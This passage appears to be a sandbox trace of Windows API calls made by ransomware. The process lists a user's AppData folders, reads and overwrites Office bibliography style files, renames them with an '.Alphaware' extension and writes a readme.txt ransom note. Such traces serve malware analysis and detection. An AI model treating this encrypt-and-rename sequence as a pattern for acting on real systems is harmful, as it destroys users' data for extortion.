nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0091.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0091.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0091.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0091.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0091.715] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.716] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0091.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0091.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0091.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0091.716] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.716] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0091.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0091.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0091.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0091.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0091.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0091.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0091.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0091.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0091.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0091.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0091.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0091.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0091.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6f297690, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x0, dwReserved1=0x0, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x0, dwReserved1=0x0, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef05590, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef05590, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x0, dwReserved1=0x0, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fac6230, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fa2dcb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fa2dcb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6f629790, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0091.723] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ff88e30, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0091.724] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x70497cf0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0091.724] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0091.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0091.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0091.725] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl", dwFileAttributes=0x80) returned 1 [0091.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0091.729] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ecfe8 | out: lpFileInformation=0x23ecfe8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6f297690, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x51722)) returned 1 [0091.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0091.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0091.729] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0091.730] ReadFile (in: hFile=0x250, lpBuffer=0x126ab5b8, nNumberOfBytesToRead=0x51722, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x126ab5b8*, lpNumberOfBytesRead=0x23e958*=0x51722, lpOverlapped=0x0) returned 1 [0091.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0091.773] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0091.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0091.789] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x88e7fa60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6ca60)) returned 1 [0091.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0091.789] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl.alphaware")) returned 1 [0091.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0091.790] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0091.792] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL", dwFileAttributes=0x80) returned 1 [0091.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0091.792] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), fInfoLevelId=0x0, lpFileInformation=0x246f9c8 | out: lpFileInformation=0x246f9c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x48839)) returned 1 [0091.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0091.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0091.793] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0091.805] ReadFile (in: hFile=0x250, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x48839, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23e958*=0x48839, lpOverlapped=0x0) returned 1 [0091.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0091.835] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0091.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0091.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x88f17fe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x60bc8)) returned 1 [0091.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0091.851] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl.alphaware")) returned 1 [0091.851] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL", dwFileAttributes=0x80) returned 1 